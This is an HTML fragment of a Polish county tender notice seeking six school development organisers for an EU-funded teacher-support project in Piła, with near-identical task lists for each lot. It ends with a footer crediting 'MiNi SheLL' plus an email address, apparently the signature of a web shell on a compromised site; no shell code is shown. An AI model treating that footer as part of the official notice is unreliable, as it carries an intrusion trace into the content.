<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 09:30, miejsce: Starostwo Powiatowe w Pile
Al. Niepodległości 33/35
64-920 Piła
pokój 365.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie prowadzone jest w ramach projektu Wdrożenie systemu doskonalenia nauczycieli i wspomagania szkół oraz przedszkoli w powiecie pilskim, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu III. Wysoka jakość systemu oświaty, Działania 3.5. Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 1 (SORE 1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 2 (SORE 2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015.
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 3 (SORE 3).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 4 (SORE 4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 5 (SORE 5).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Szkolny Organizator Rozwoju Edukacji nr 6 (SORE 6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz szkół/przedszkoli oraz liczba osób:
Liczba szkół/przedszkoli z terenu powiatu pilskiego - 6. Przydział placówek nastąpi po zakończeniu postępowania, odrębnie na każdy rok szkolny: 2013/2014 i 2014/2015. 
Wykaz zadań SORE (80h/mc):
a)  stały kontakt ze szkołą/przedszkolem - z dyrektorem i radą pedagogiczną, 
b) współpraca z dyrektorem i radą pedagogiczną w przeprowadzaniu diagnozy potrzeb i określeniu obszarów wsparcia,
c) przeprowadzenie warsztatu diagnostyczno-rozwojowego dla zespołu wyłonionego z rady pedagogicznej,
d) przygotowanie Rocznego Planu Wspomagania (RPW), w tym dostosowanie ofert doskonalenia do zdiagnozowanych potrzeb konkretnej szkoły/przedszkola,
e) przygotowanie harmonogramu szkoleń we współpracy z dyrektorem szkoły/przedszkola,
f) wsparcie szkoły/przedszkola i dyrektora na kolejnych etapach przygotowania i realizacji RPW,
g) odpowiedzialność za prawidłową organizację działań związanych z zewnętrznym wspomaganiem,
h) pozyskiwanie zewnętrznych ekspertów,
i) wsparcie nauczycieli w czasie wdrażania nowych umiejętności i wypracowanych procedur,
j) monitorowanie procesu doskonalenia - prowadzenie spotkań, konsultacji grupowych i indywidualnych z dyrektorami, nauczycielami, ekspertami,
k) dokumentowanie podejmowanych działań poprzez: scenariusze warsztatów i konsultacji, protokoły z wywiadów z dyrektorami szkół/przedszkoli, kwestionariusze diagnostyczne, protokoły spotkań z radą pedagogiczną, dzienniki zajęć z realizacji form doskonalenia, wykaz ofert doskonalenia z poszczególnych szkół/przedszkoli, ankiety ewaluacyjne ze szkoleń, harmonogramy realizacji RPW,
l) opracowanie sprawozdań z realizacji rocznego planu wspomagania w każdej szkole/przedszkolu,
ł) przedstawienie sprawozdań z przebiegu realizacji RPW dyrektorowi szkoły/przedszkola oraz radzie pedagogicznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com